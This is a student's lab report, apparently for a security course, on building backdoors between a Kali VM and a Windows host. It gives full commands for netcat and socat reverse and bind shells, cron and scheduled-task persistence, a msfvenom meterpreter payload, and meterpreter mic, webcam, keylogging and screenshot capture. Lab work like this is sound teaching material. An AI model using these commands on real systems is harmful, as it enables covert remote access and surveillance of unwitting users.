其他分享
首页 > 其他分享> > Exp2 后门原理与实践

Exp2 后门原理与实践

作者:互联网

Exp2 后门原理实验内容

一、实践目标

二、基础知识问答

(1)例举你能想到的一个后门进入到你系统中的可能方式?

在非官方网站上下载了病毒软件;
点击不安全网页链接;
使用未知风险的U盘。

(2)例举你知道的后门如何启动起来(win及linux)的方式?

修改linux的cron程序、注入shellcode、网络协议捆绑、社会工程学。

(3)Meterpreter有哪些给你映像深刻的功能?

录音,录像,屏幕截图,获取击键记录。

(4)如何发现自己有系统有没有被安装后门?

杀毒软件及防火墙反馈,还可以在终端中通过netstat命令查看有无异常开放的端口,定期检查是否有未知自启动项。

三、实验内容

1.使用netcat获取主机操作Shell,cron启动

1 Windows获取Kali虚拟机的shell

1.查看Windows主机的IP地址
ipconfig

2.在ncat.exe目录下打开cmd监听本机的1305端口
ncat.exe -l -p 1305

3.kali反弹连接Windows
nc 192.168.133.222 1305 -e /bin/sh

4.Windows返回kali的shell
ls

2 Kali虚拟机获取Windows的shell

1.获取Kali虚拟机的IP地址

2.Kali中开启监听
ncat -l -p 1305

3.Windows反弹连接
ncat.exe -e cmd.exe 192.168.37.130 1305

4.Kali虚拟机返回Windows的shell
dir

3 cron启动

1.Kali中执行crontab -e指令
crontab -e

2.设置自启动时间
40-55 * * * * /bin/netcat 192.168.133.222 1305 -e /bin/sh


则当主机时间为每小时的40-55分,若存在一台ip地址为 192.168.37.130的主机正在监听1305端口,该主机便可以获取到Kali的Shell

3.Windows主机在指定时间监听
ncat.exe -l -p 1305

2.使用socat获取主机操作Shell, 任务计划启动

1 Windows获取kali虚拟机的shell

1.Kali开放1305端口
socat tcp-listen:1305 system:bash,pty,stderr

2.Windows连接Kali虚拟机,验证shell功能
socat - tcp:192.168.133.222:1305

2 Kali虚拟机获得Windows的shell

1.Windows开放1305端口
socat tcp-listen:1305 exec:cmd,pty,stderr

2.Kali虚拟机连接Windows
socat - tcp:192.168.133.222:1305

3 任务计划启动

1.打开任务计划程序,单击创建任务,编辑名称

2.新建操作,新建触发器,将socat.exe所在位置填入并添加以下参数,其他选项不变

3.测试

socat - tcp:192.168.133.222:1305

3.使用MSF meterpreter生成可执行文件,利用ncat传送到主机并运行获取主机Shell

1 生成可执行文件

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.133.222 LPORT=1305 -f exe > shell.exe

2 利用ncat传送到主机并运行获取主机Shell

1.在Windows的cmd下开始监听1305端口
ncat.exe -l 1305 > shell.exe

2.Kali虚拟机传送shell.exe
nc 192.168.133.222 1305 < shell.exe

3.msf打开监听
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.37.130
set LPORT 1305

4.在Windows中打开shell.exe

5.获取主机shell
exploit

4.使用MSF meterpreter获取目标主机音频、摄像头、击键记录等内容,并尝试提权

1 获取目标主机音频

MSF exploit中输入record_mic指令进行录音,-d可设置时长

2 获取目标主机摄像头

webcam_snap

3 获取击键记录

keyscan_start开始捕获键盘记录,keyscan_dump获取击键记录,-d可设置时长

4 截取主机屏幕

screenshot

实验体会:

本次实验中通过对后门概念的理解和实际操作,掌握了后门的生成过程和注入方式,明白了后门其实就是留在计算机系统中,绕过了安全检测可以用某种方式控制计算机系统的途径。
实验中对ip比较模糊,经常不知道选择主机IP还是虚拟机IP,生成攻击文件ip用来传递参数,返回攻击者的电脑,用来连接的nc的ip为对方ip。另外,防火墙和杀毒软件多次阻止实验中断,也切实感受到了后门的工作原理、防火墙和杀毒软件的重要性。
对于不明网站上的软件下载和不安全链接以后会多多警惕。

标签:后门,1305,shell,Windows,Exp2,实践,exe,Kali,主机
来源: https://www.cnblogs.com/ltq20191305/p/16089699.html